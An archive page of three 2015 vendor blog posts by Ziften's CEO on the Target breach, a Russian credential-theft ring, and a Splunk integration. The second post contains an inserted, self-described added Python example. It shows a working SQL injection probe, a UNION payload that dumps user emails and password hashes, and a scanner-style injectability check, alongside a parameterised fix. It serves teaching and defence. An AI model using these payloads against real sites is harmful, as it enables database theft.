Monthly Archives: April 2015

Your Organization’s Cyber Security Defenses Need To Be Strong. Learn Lessons From The Target Attack – Charles Leaver

By Charles Leaver CEO Ziften


After Target was breached, it took the company many months to recover and to be given a clean bill of health.

Constant Recovery Effort And Reports Of Financial Loss

It was a major story when Target suffered its data breach. Like all big news stories it faded from national coverage, but for the company itself it remained a top priority. The retailer lowered its earnings forecast for 2014 once again, which implies that the business had underestimated the impact of the attack it was exposed to, according to CNN Money.

The reduction in revenue was significant: the company reported 62% lower profits, and it booked $111 million in costs directly attributable to the breach in the second financial quarter alone. The result is a business that was once robust now looking a shadow of its former self because of a cyber attack.

As the fallout continued, the scale of the attack became clear. Personal information for around 110 million individuals was compromised, and for 40 million of them the stolen data included payment card details. As news of the breach spread, the company made significant changes, including stricter cyber security measures and a change in its technology leadership. Long-standing CEO Gregg Steinhafel also resigned. That is still not considered enough to offset the effect of the attack. Target’s shareholders are absorbing the adverse effects of the attack as much as the business itself, according to Brian Sozzi of Belus Capital.

In an e-mail to CNN Money, Sozzi said: “Target just dropped an epic full-year profits warning onto the heads of its remaining shareholders. Target has actually offered investors ABSOLUTELY NO reason to be encouraged that a global turnaround is covertly emerging.”

Target Provides A Lesson For All Organizations About Improved Pre-emptive Measures

No matter how proactively a company responds to a cyber attack, there is no guarantee that recovery will be quick. The bottom line is that a data breach is bad news for any company, however it is framed or remediated. Prevention is the best way forward: take steps to ensure an attack does not succeed against your organization in the first place. Endpoint threat detection systems can play a substantial role in maintaining strong defenses for any company that implements them.


Charles Leaver – With Russian Hackers Stealing Huge Amounts Of Information You Must Defend Your Organization With Continuous Endpoint Monitoring

Charles Leaver Ziften CEO

What may be the largest known cyber attack in the history of data breaches has been uncovered by an American cyber security company. The company believes that a group of Russian cyber criminals it has been investigating for several months is responsible for stealing billions of passwords and other sensitive personal data. The group is alleged to have stolen 4.5 billion credentials; many were duplicates, leaving 1.2 billion unique data profiles. The records were taken from 420,000 sites of all sizes, from large brand-name websites to small mom-and-pop stores.

The New York Times reported that the gang comprises about a dozen people. Starting out with small-scale spamming in 2011, they acquired most of the data by buying stolen databases.

In an interview with PCMag, Alex Holden, founder of the company that found the breach, said: “The gang started by just buying the databases that were readily available online.” He described them as “bottom feeders” who bought at fire sales. As time progressed they started buying higher-quality databases. In Holden’s words: “It’s sort of like graduating from stealing bicycles to stealing pricey automobiles.”

A Progression From Spamming To Utilizing Botnets

The group then changed its approach. It used botnets to gather stolen credentials on a much larger scale. The botnets automated the process of identifying vulnerable websites, which let the group work around the clock. Whenever an infected user visited a site, the bot automatically checked whether the site was vulnerable to SQL injection. With an injection, a frequently used hacking technique, a site’s database can be forced to reveal its contents by entering a simple query. The botnet flagged the susceptible sites and the hackers returned later to extract the data. Using the botnet was ultimately the group’s downfall: it was the botnet activity that led the security company to discover them.
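To make the two steps in that paragraph concrete, here is an added example (not code from the original post or from the gang’s tooling, and not a real site) that builds a tiny SQLite database with a public products table and a private users table, exposes a product search in a vulnerable form and a parameterised form, and then runs the scanner’s quote-breaking probe and the follow-up UNION payload against both. The table names, rows and payload strings are constructed for the demonstration; the technique is generic.

```python
import sqlite3

# Constructed sample data for the demonstration (not taken from the original post).
USERS = [
    ("alice@example.com", "hash-of-alice-password"),
    ("bob@example.com", "hash-of-bob-password"),
]
PRODUCTS = [(1, "lamp"), (2, "chair")]


def make_db():
    """Build an in-memory SQLite database with a public table and a private one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (email TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def search_vulnerable(conn, term):
    """Product search as the botnet hoped to find it: user input spliced into the SQL text."""
    sql = "SELECT id, name FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The same search with a bound parameter: the input is data, never SQL."""
    return conn.execute(
        "SELECT id, name FROM products WHERE name = ?", (term,)
    ).fetchall()


# The boolean probe an automated scanner sends. Treated as data it matches no product;
# if the quote reaches the SQL parser the WHERE clause becomes always-true.
PROBE = "' OR '1'='1"

# The follow-up payload that "forces the database to reveal its contents": a UNION ALL
# that appends rows from a table the original query never referenced. The trailing
# WHERE ''=' reuses the closing quote the application appends, so the injected
# statement stays syntactically complete without needing a comment marker.
DUMP = "x' UNION ALL SELECT email, password_hash FROM users WHERE ''='"


def looks_injectable(conn, search):
    """The bot's check: does a quote-breaking probe return more rows than a harmless
    term that matches nothing? A vulnerable endpoint answers the probe with every row."""
    baseline = search(conn, "no-such-product")
    probed = search(conn, PROBE)
    return len(probed) > len(baseline)


def dump_users(conn, search):
    """The extraction step the attackers come back for: pull the private table through
    the flagged search endpoint. Returns the leaked (email, password_hash) rows."""
    return search(conn, DUMP)


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", search_vulnerable), ("parameterised", search_safe)):
        print(label, "injectable:", looks_injectable(db, fn), "leaked:", dump_users(db, fn))
```

Run as a script it reports the vulnerable search as injectable and prints both user rows leaked through it, while the parameterised search is not injectable and leaks nothing. The differential check in `looks_injectable` is the point worth noticing: a scanner does not need an error message, only a change in the number of rows returned, so suppressing database errors alone does not hide a vulnerable endpoint.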

The security company believes the billions of records were not stolen all at once, and that most were probably purchased from other cyber criminals. According to the Times, very few of the stolen records have been sold online; instead the group has used the information to send spam on social media on behalf of other groups, for a fee. Various cyber security specialists say the magnitude of this breach signals a trend of criminals stockpiling large numbers of personal profiles over time and saving them for later use, according to the Wall Street Journal.

Avivah Litan, security analyst at the research firm Gartner, said: “Companies that rely on user names and passwords have to develop a sense of urgency about altering this. Until they do, wrongdoers will simply keep stockpiling individuals’ credentials.”

Cyber attacks and breaches on this scale underline the need for organizations to protect themselves with the latest defenses. Endpoint threat detection and response systems give organizations a clearer picture of the threats facing their networks and actionable information on how best to resist attacks. With large data breaches set to become more frequent, continuous endpoint visibility is crucial to a company’s security. If the organization’s network is monitored continuously, threats can be identified in real time, which limits the damage a breach can do to a company’s reputation and bottom line.


Why The Ziften And Splunk Active Response Framework Is A Major Step Forward In Cyber Security – Charles Leaver

Written By Charles Leaver CEO Ziften



We sponsored a terrific Splunk .conf2014 in Las Vegas and returned energized and eager to push our solution at Ziften even further forward. One talk of particular interest was by Jose Hernandez, Security Solutions Architect at Splunk, titled “Using Splunk to Automatically Mitigate Risks”. If you wish to see his slides and a recording of the talk, please go to

Using Splunk to assist with mitigation, or “Active Response” as I like to call it, is a great idea. Having all your intelligence data streaming into Splunk, whether endpoint data, external threat feeds or anything else, is very powerful, and being able to act on that data truly closes the loop. At Ziften we have an effective continuous monitoring solution on the endpoint, and pairing it with Splunk is something we are very proud of. Real-time data analysis coupled with the ability to respond and take action against events is a strong move in the right direction.

Ziften has developed a mitigation action that uses the Active Response code Splunk provides. A demo video is included in this post below. As a proof of concept we created a mitigation action within our Ziften App for Splunk. Once the action is created, its results can be observed and tracked within Splunk ES (Enterprise Security). This is a major addition: users can now monitor and track mitigations within Splunk ES, which gives you the advantage of closing the loop and building a history of your actions.

That Splunk is driving such an initiative delights us; it is likely to grow, and we are committed to supporting it and building on it. This is an exciting time in the Endpoint Detection and Response space, and the inclusion of the Active Response Framework in Splunk will, in my opinion, generate a high degree of interest.

For any questions regarding the Ziften App for Splunk, please send an email to